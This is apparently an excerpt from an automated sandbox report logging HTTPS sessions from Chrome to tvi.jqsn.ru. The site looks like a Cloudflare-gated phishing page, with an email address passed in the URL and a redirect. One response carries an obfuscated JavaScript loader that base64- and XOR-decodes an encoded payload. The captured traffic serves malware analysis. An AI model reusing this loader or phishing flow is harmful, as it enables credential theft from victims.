                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IjdFR0ZSajlLampnQ3R3RmpLbkt3a0E9PSIsInZhbHVlIjoiNDZLaGJoeUhhWGFRZWhkU0VkRlRSa1IrVVVWekdyTm0yMCtHMk8rVVA3d2NzQmZRSlhDalpMTFJFTTZOM1hVZXNKbnJ2T0VGWnNLVkZPcUpaSEtVKzIyYXhTQmhsMzkzM0tqVThVV0tTSURMMDh6VFAxeWwzUW9BeVlnRTlaOTUiLCJtYWMiOiIzNDMzZGY0NmI0MTdhZTIyOTlhYTgzNDNkZjg5NzRkZjk0YjJlMTVhOWU5NjhjMTI4ZmQzODQ4MmM3YjAxNzkxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlJTUUhoZ1FnQnFKVS8rRE8vd1lQY1E9PSIsInZhbHVlIjoiREpzT1RGUm5BQ0w3aC9JT1NRcEN5d0dxN2JaOFkya3FFQXJ5T0tlT2pzOGZOYXdVd0daQjBZQzIyL0Q1YkZqbkxGNElVQlpobWlET041V3dqY3hWc3dHMm55UjJJR3ZOR3JaRnl0Vi9KZy9Nb1kybXZMR3pTczdEZWJVZlZFOVEiLCJtYWMiOiIwMjQyNTNjYjFjMzU3YTU0M2Q2MjMwMDNkZDFjMjlkZmU5M2NjZTI1MTE0ZjUxZjQ0NTM2NWJhYjBkYjE0NWFmIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:41 UTC1305OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 4e 41 6c 70 36 49 36 6f 64 59 67 38 43 36 72 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 0d 0a 0d 0a 30 2e 6e 33 7a 6f 47 6a 37 6a 74 50 53 61 4c 55 6f 61 4e 43 52 58 48 4e 46 44 64 31 59 53 67 72 5f 47 51 50 56 69 59 54 57 33 46 55 54 6b 53 2d 73 65 45 59 36 30 67 67 44 33 47 4e 58 70 46 30 7a 6d 78 44 45 5a 35 57 6c 51 76 57 59 44 30 44 39 30 51 6e 74 5f 65 74 69 4a 45 6a 49 43 6f 68 64 44 43 68 6c 4e 51 59 5f 36 74 4c 54 39 42 49 6d 63 45 41 37 34 42 62 6b 6b 50 56 5a 52 66 6b 4d 4a 49 37 45 53 46 6b 4b 62 38 52 7a 38 6f 42 74 5a 5a 46 66
                                                                                                                          Data Ascii: ------WebKitFormBoundaryNAlp6I6odYg8C6rAContent-Disposition: form-data; name="cf-turnstile-response"0.n3zoGj7jtPSaLUoaNCRXHNFDd1YSgr_GQPViYTW3FUTkS-seEY60ggD3GNXpF0zmxDEZ5WlQvWYD0D90Qnt_etiJEjICohdDChlNQY_6tLT9BImcEA74BbkkPVZRfkMJI7ESFkKb8Rz8oBtZZFf
                                                                                                                          2024-04-17 00:34:43 UTC1097INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:43 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache, private
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2R9qDZOlZEs234GDkfQeubyLvfoC97iS201np9EaWhQoZJpC2%2Bbs9HxNUcwmzV%2B3it%2B9GhPum5BBNlO%2Fevj2ZE96L0AI7z2LFtELS2dRpdYn6FkfwYieET1n0ELYTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik1nUG1NcGN3SUhpc1VIb1JJNUpRNXc9PSIsInZhbHVlIjoiN2MzeWlKWE51RjUrYWk3MU9yTDJqMjdyc3pCSU9HSmNBU1lNcHlDcTQzVy9tQnE4VHlYOUpicXpKWGRNeWM3UXJnOHJUa3ovMmlNYjFJeE1EMjN5MDlFZURLaFBKM01LVTd2YkhCR3RtK0Q4Y1NoZnNVbGNlTUdGWlB3TmtRYmciLCJtYWMiOiJhNjEwYjAxOTdhMTg2MjZmNDk4NWQwZDUxODczNTY0OTRmMjdiYmYwYWQwMTNhNGI4MzY3ZDI4MTQzZTIyZWZkIiwidGFnIjoiIn0%3D; expires=Wed, 17-Apr-2024 02:34:42 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                          2024-04-17 00:34:43 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 42 78 4e 55 52 32 64 47 4a 70 5a 6d 78 57 52 45 52 4a 55 31 64 43 61 32 30 79 4d 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 56 6e 6c 7a 4b 31 56 79 65 58 70 55 56 48 4e 53 55 45 39 4b 59 7a 46 4c 51 30 6b 35 51 30 56 51 62 7a 5a 52 64 56 51 7a 51 30 74 35 4e 54 46 49 64 30 70 4f 62 55 39 58 54 7a 56 4d 4d 33 4e 48 54 44 51 31 54 45 68 4a 53 54 42 50 62 30 70 44 51 6d 39 4e 51 7a 6c 45 54 6a 41 34 4f 55 68 4f 4d 58 64 79 4d 45 64 51 51 6b 35 42 57 56 5a 36 55 6c 68 30 4f 47 39 34 51 6e 6b 30 65 58 5a 45 62 54 6c 79 64 32 46 44 62 57 74 6d 55 55 5a 53 64 44 5a 4a 52 6e 56 35 51 6c 64 6c 59 54 52 6f 5a 55 73 76 59 79 74 4c 4e 57 77
                                                                                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InBxNUR2dGJpZmxWRERJU1dCa20yM3c9PSIsInZhbHVlIjoiVnlzK1VyeXpUVHNSUE9KYzFLQ0k5Q0VQbzZRdVQzQ0t5NTFId0pObU9XTzVMM3NHTDQ1TEhJSTBPb0pDQm9NQzlETjA4OUhOMXdyMEdQQk5BWVZ6Ulh0OG94Qnk0eXZEbTlyd2FDbWtmUUZSdDZJRnV5QldlYTRoZUsvYytLNWw
                                                                                                                          2024-04-17 00:34:43 UTC26INData Raw: 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 7d 0d 0a
                                                                                                                          Data Ascii: 14{"status":"success"}
                                                                                                                          2024-04-17 00:34:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          24192.168.2.449768104.17.3.1844433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:41 UTC486OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/376309965:1713310987:XtWNF_lGr5ooSfnAjw_nRac0X3c-4XXJ9QQQN9vg0as/875854595e7f53f2/ce9d72d10a780bc HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:42 UTC386INHTTP/1.1 400 Bad Request
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:42 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          cf-chl-out: h9Q8DpLkDXiLJ2fLZihxbg==$QawhQQfzdo46cMSm8Kxb5Q==
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854b479b453cc-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:34:42 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                                                                          Data Ascii: 7invalid
                                                                                                                          2024-04-17 00:34:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          25192.168.2.449771104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:43 UTC1459OUTGET /i8jbs1sy/ HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          Referer: https://tvi.jqsn.ru/i8jbs1sy/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6Ik1nUG1NcGN3SUhpc1VIb1JJNUpRNXc9PSIsInZhbHVlIjoiN2MzeWlKWE51RjUrYWk3MU9yTDJqMjdyc3pCSU9HSmNBU1lNcHlDcTQzVy9tQnE4VHlYOUpicXpKWGRNeWM3UXJnOHJUa3ovMmlNYjFJeE1EMjN5MDlFZURLaFBKM01LVTd2YkhCR3RtK0Q4Y1NoZnNVbGNlTUdGWlB3TmtRYmciLCJtYWMiOiJhNjEwYjAxOTdhMTg2MjZmNDk4NWQwZDUxODczNTY0OTRmMjdiYmYwYWQwMTNhNGI4MzY3ZDI4MTQzZTIyZWZkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBxNUR2dGJpZmxWRERJU1dCa20yM3c9PSIsInZhbHVlIjoiVnlzK1VyeXpUVHNSUE9KYzFLQ0k5Q0VQbzZRdVQzQ0t5NTFId0pObU9XTzVMM3NHTDQ1TEhJSTBPb0pDQm9NQzlETjA4OUhOMXdyMEdQQk5BWVZ6Ulh0OG94Qnk0eXZEbTlyd2FDbWtmUUZSdDZJRnV5QldlYTRoZUsvYytLNWwiLCJtYWMiOiI3ZjgxYzQ5NDAyZGQ1NjBlZDhmZGI0MGI3MDRhZWIxNTYyY2RkOThhMTE5ZGM3ZTRmZDY5MGIxOWU2ZDIzNTE5IiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:45 UTC1128INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:45 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache, private
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7IHim3SGQr0Az4JE2y9PL24jfWjxeKc3m3iyg4dGp5hbggdyU%2BT3vmnGaFwtFHeEJ4bJ0BSzEG5gJlnNvLLo7Ea7AqpyYgJ%2Bl0KQ732KYwdX0FL%2FNgm%2FsTpOpavLDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6Im9xTElBcXVSWk45aFJ5dU4zTDE2RFE9PSIsInZhbHVlIjoicXNuUVo2TXAzTExadUMwUFR4bTkxVmM5eERBTDdnZlJrOVFTREVjMUpQblpOZCtiRTkxS0tQZDFvaVJTZlpPZ0NqYjg1ZWl3YjNBTXFjcUxyQnM4T1BPLzhXRk1vWEVVNnljZlp2TG9OTDA3a3pueWtScnRZK0xqVmw2U3FLNzQiLCJtYWMiOiI4YWYzNDU0MjEzMmY5ZGEwMzI5OGQ3M2NmMDgwOTgyMGQxNTgzZWVhMTNlZmUxYzc4NTEyNjY4NTk2NzcyN2RjIiwidGFnIjoiIn0%3D; expires=Wed, 17-Apr-2024 02:34:44 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                          2024-04-17 00:34:45 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 69 39 77 61 47 70 4e 62 30 38 32 54 47 64 72 4f 58 52 61 51 54 5a 6e 4e 57 55 7a 55 31 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 33 42 30 56 44 56 33 62 56 52 53 5a 6b 52 52 61 46 56 73 4e 58 42 33 56 6d 46 59 59 32 35 6e 59 57 35 52 63 47 52 4b 63 30 73 72 64 7a 5a 51 57 58 5a 78 52 7a 4a 68 57 47 4a 75 65 58 42 47 64 6b 6c 34 55 6e 70 69 55 58 46 57 54 6d 6c 58 61 58 4e 43 65 6c 4a 6f 52 33 52 4f 53 58 68 70 61 30 78 6a 59 31 46 79 57 45 46 79 5a 58 56 48 65 55 39 4a 56 46 6c 74 64 45 4e 72 64 6b 52 49 5a 6b 38 76 63 55 31 7a 53 7a 4e 6d 4d 47 6f 30 4f 43 38 31 54 30 4a 73 63 6b 31 48 4f 54 5a 75 65 6d 6c 77 52 45 56 4b 65 45 73
                                                                                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ii9waGpNb082TGdrOXRaQTZnNWUzU1E9PSIsInZhbHVlIjoiT3B0VDV3bVRSZkRRaFVsNXB3VmFYY25nYW5RcGRKc0srdzZQWXZxRzJhWGJueXBGdkl4UnpiUXFWTmlXaXNCelJoR3ROSXhpa0xjY1FyWEFyZXVHeU9JVFltdENrdkRIZk8vcU1zSzNmMGo0OC81T0Jsck1HOTZuemlwREVKeEs
                                                                                                                          2024-04-17 00:34:45 UTC1369INData Raw: 37 31 34 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 70 61 75 4e 44 74 59 77 78 4c 28 76 69 6e 77 63 75 61 65 76 58 2c 20 57 4c 48 41 6b 49 6e 69 42 43 29 20 7b 0d 0a 6c 65 74 20 4f 64 69 6d 73 41 4d 69 53 7a 20 3d 20 27 27 3b 0d 0a 76 69 6e 77 63 75 61 65 76 58 20 3d 20 61 74 6f 62 28 76 69 6e 77 63 75 61 65 76 58 29 3b 0d 0a 6c 65 74 20 72 79 70 45 4b 4a 58 57 64 6e 20 3d 20 57 4c 48 41 6b 49 6e 69 42 43 2e 6c 65 6e 67 74 68 3b 0d 0a 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 76 69 6e 77 63 75 61 65 76 58 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 4f 64 69 6d 73 41 4d 69 53 7a 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 76 69 6e 77 63 75 61 65 76 58 2e 63 68 61 72 43 6f
                                                                                                                          Data Ascii: 714<script>function pauNDtYwxL(vinwcuaevX, WLHAkIniBC) {let OdimsAMiSz = '';vinwcuaevX = atob(vinwcuaevX);let rypEKJXWdn = WLHAkIniBC.length;for (let i = 0; i < vinwcuaevX.length; i++) { OdimsAMiSz += String.fromCharCode(vinwcuaevX.charCo
                                                                                                                          2024-04-17 00:34:45 UTC450INData Raw: 4b 78 6f 32 61 46 67 55 4d 41 45 61 54 47 42 6c 46 52 70 43 57 32 6b 2f 57 53 51 55 4c 47 4d 38 64 46 67 65 55 6c 39 64 59 57 41 54 62 57 6c 62 48 77 4e 66 48 67 35 67 46 48 59 59 54 42 6b 5a 51 45 67 79 5a 47 46 76 46 51 6b 34 51 69 6b 4b 4f 69 45 69 47 78 77 75 64 44 39 4a 61 55 56 74 62 6d 59 56 48 43 4a 4b 41 77 67 58 4b 7a 34 78 66 77 59 6c 41 46 4a 5a 63 6d 30 67 4d 31 6b 5a 62 52 6c 2f 62 6d 39 74 62 6d 5a 43 48 43 6f 47 48 52 4e 68 49 53 45 6c 56 41 45 74 44 52 78 4b 4a 7a 38 72 49 42 56 49 5a 42 55 62 43 69 73 69 4f 57 68 5a 47 69 63 44 42 67 30 67 49 32 41 32 56 41 45 73 44 42 4d 4a 4b 6e 5a 44 54 42 56 56 5a 45 49 50 61 55 56 74 62 6d 59 56 48 43 4a 4b 41 77 67 58 4b 7a 34 78 66 77 59 6c 41 46 4a 46 63 6e 42 75 4b 45 41 5a 4b 45 73 4a 61 55 56
                                                                                                                          Data Ascii: Kxo2aFgUMAEaTGBlFRpCW2k/WSQULGM8dFgeUl9dYWATbWlbHwNfHg5gFHYYTBkZQEgyZGFvFQk4QikKOiEiGxwudD9JaUVtbmYVHCJKAwgXKz4xfwYlAFJZcm0gM1kZbRl/bm9tbmZCHCoGHRNhISElVAEtDRxKJz8rIBVIZBUbCisiOWhZGicDBg0gI2A2VAEsDBMJKnZDTBVVZEIPaUVtbmYVHCJKAwgXKz4xfwYlAFJFcnBuKEAZKEsJaUV
                                                                                                                          2024-04-17 00:34:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          26192.168.2.449774172.67.130.2124433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:43 UTC1092OUTGET /glVuTopMUrrdyu89qRN0N14qAuhvIhKVz2 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6Ik1nUG1NcGN3SUhpc1VIb1JJNUpRNXc9PSIsInZhbHVlIjoiN2MzeWlKWE51RjUrYWk3MU9yTDJqMjdyc3pCSU9HSmNBU1lNcHlDcTQzVy9tQnE4VHlYOUpicXpKWGRNeWM3UXJnOHJUa3ovMmlNYjFJeE1EMjN5MDlFZURLaFBKM01LVTd2YkhCR3RtK0Q4Y1NoZnNVbGNlTUdGWlB3TmtRYmciLCJtYWMiOiJhNjEwYjAxOTdhMTg2MjZmNDk4NWQwZDUxODczNTY0OTRmMjdiYmYwYWQwMTNhNGI4MzY3ZDI4MTQzZTIyZWZkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBxNUR2dGJpZmxWRERJU1dCa20yM3c9PSIsInZhbHVlIjoiVnlzK1VyeXpUVHNSUE9KYzFLQ0k5Q0VQbzZRdVQzQ0t5NTFId0pObU9XTzVMM3NHTDQ1TEhJSTBPb0pDQm9NQzlETjA4OUhOMXdyMEdQQk5BWVZ6Ulh0OG94Qnk0eXZEbTlyd2FDbWtmUUZSdDZJRnV5QldlYTRoZUsvYytLNWwiLCJtYWMiOiI3ZjgxYzQ5NDAyZGQ1NjBlZDhmZGI0MGI3MDRhZWIxNTYyY2RkOThhMTE5ZGM3ZTRmZDY5MGIxOWU2ZDIzNTE5IiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:45 UTC673INHTTP/1.1 404 Not Found
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:45 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d0ZoHqpsd4bxtHi4oh6izArmsT9XPI2GBg5R2qx7sz1zL3mMIgQWfRvzQWtIw8pJrAJcWhXhssIClmQe5Dcofmm5mQC601%2Beu1G2AnS0tRNuOzr4rDZW4iXa5CN3dQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854c1d8ed4578-ATL
                                                                                                                          2024-04-17 00:34:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          27192.168.2.449770104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:45 UTC1433OUTGET /i8jbs1sy/?GXnobody@nobody.org HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          Referer: https://tvi.jqsn.ru/i8jbs1sy/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6Im9xTElBcXVSWk45aFJ5dU4zTDE2RFE9PSIsInZhbHVlIjoicXNuUVo2TXAzTExadUMwUFR4bTkxVmM5eERBTDdnZlJrOVFTREVjMUpQblpOZCtiRTkxS0tQZDFvaVJTZlpPZ0NqYjg1ZWl3YjNBTXFjcUxyQnM4T1BPLzhXRk1vWEVVNnljZlp2TG9OTDA3a3pueWtScnRZK0xqVmw2U3FLNzQiLCJtYWMiOiI4YWYzNDU0MjEzMmY5ZGEwMzI5OGQ3M2NmMDgwOTgyMGQxNTgzZWVhMTNlZmUxYzc4NTEyNjY4NTk2NzcyN2RjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ii9waGpNb082TGdrOXRaQTZnNWUzU1E9PSIsInZhbHVlIjoiT3B0VDV3bVRSZkRRaFVsNXB3VmFYY25nYW5RcGRKc0srdzZQWXZxRzJhWGJueXBGdkl4UnpiUXFWTmlXaXNCelJoR3ROSXhpa0xjY1FyWEFyZXVHeU9JVFltdENrdkRIZk8vcU1zSzNmMGo0OC81T0Jsck1HOTZuemlwREVKeEsiLCJtYWMiOiJkNTNjY2ZlNmY0ZWEwZGJhNTBmNjYwZTM4NjQyMGJlYzI5YzRmOGMzYTI5YmZiYTI3NDBkMmQ3ZGJhMWQzOTVhIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:46 UTC1257INHTTP/1.1 302 Found
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:46 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache, private
                                                                                                                          Location: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x6eSpomX1oBrHqHi32DXhf0FY5MMRZkilCsnI2Sw5NCUcPgP7FQt5%2BP2mG4WCsZILIe1QPeJtvbpRFQzifblGXmc%2BCkxanhSkWpgSmh26pFE3Vz4mjcw586aI6ZUCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6IkM5bWdRZ05QK1ZmdG55eUZmcEJ0WUE9PSIsInZhbHVlIjoiZ2Q5ellVcVRUQXlqajJhS21HMWlML2FndmhNb3FMZ0FCZm0zQllPa2R3eUNFaVBWcUNEeXQzL0xwMmYyWEhtZFE2Unp1YmNtZXZmNzlnWERUbmMwQUgyUllDSnJGZjJNYVNPS1VPTEM2NjFSSzFOU3R4ZFh6eFcvUmdjQXFmcEkiLCJtYWMiOiIxOWE5YWRlYjEwYjY5ZmMxMWQzYjQ5YTYyY2NmMDdkY2EyMmQ2N2VjNjQzYjc5MDkyZWZkNjY1YmQ5ZDAzM2ZmIiwidGFnIjoiIn0%3D; expires=Wed, 17-Apr-2024 02:34:46 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                          2024-04-17 00:34:46 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 64 77 51 31 46 78 56 6d 59 31 55 31 5a 70 59 6b 35 45 63 45 31 4c 57 55 4d 7a 53 31 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 63 6b 31 77 63 79 39 6f 4c 32 4e 79 61 32 4a 6d 59 7a 6b 7a 54 44 52 42 54 46 6c 4b 62 54 4a 34 62 56 6c 4e 61 48 63 33 63 45 35 61 56 30 4a 49 4c 30 46 77 4b 30 35 34 52 58 64 75 57 58 68 56 4f 58 6c 6c 63 6c 6c 7a 59 54 6c 6d 4d 54 5a 74 65 6b 4a 36 5a 30 74 4e 65 58 42 36 64 48 4d 78 4d 57 5a 55 5a 32 31 71 4d 48 63 76 4d 57 34 30 4f 47 4e 4a 62 45 52 5a 53 6c 46 75 61 44 5a 69 5a 45 4e 43 53 6b 52 48 5a 45 68 33 62 57 5a 61 55 31 5a 49 4d 6b 70 61 63 6a 4a 50 53 56 6c 69 63 32 77 30 65 44 5a 4b 63 6c 41
                                                                                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IndwQ1FxVmY1U1ZpYk5EcE1LWUMzS1E9PSIsInZhbHVlIjoick1wcy9oL2Nya2JmYzkzTDRBTFlKbTJ4bVlNaHc3cE5aV0JIL0FwK054RXduWXhVOXllcllzYTlmMTZtekJ6Z0tNeXB6dHMxMWZUZ21qMHcvMW40OGNJbERZSlFuaDZiZENCSkRHZEh3bWZaU1ZIMkpacjJPSVlic2w0eDZKclA
